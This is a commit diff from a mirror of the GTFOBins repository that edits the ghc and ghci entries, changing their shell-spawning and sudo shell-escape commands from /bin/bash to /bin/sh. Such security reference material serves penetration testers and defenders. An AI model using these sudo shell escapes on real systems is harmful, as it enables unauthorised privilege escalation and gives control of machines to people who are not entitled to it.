mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
Enforce conventions
This commit is contained in:
@@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: ghc -e 'System.Process.callCommand "/bin/bash"'
|
||||
- code: ghc -e 'System.Process.callCommand "/bin/sh"'
|
||||
sudo:
|
||||
- code: sudo ghc -e 'System.Process.callCommand "/bin/bash"'
|
||||
- code: sudo ghc -e 'System.Process.callCommand "/bin/sh"'
|
||||
---
|
||||
|
@@ -3,9 +3,9 @@ functions:
|
||||
shell:
|
||||
- code: |
|
||||
ghci
|
||||
Prelude> System.Process.callCommand "/bin/bash"
|
||||
System.Process.callCommand "/bin/sh"
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ghci
|
||||
Prelude> System.Process.callCommand "/bin/bash"
|
||||
System.Process.callCommand "/bin/sh"
|
||||
---
|
||||
|
Reference in New Issue
Block a user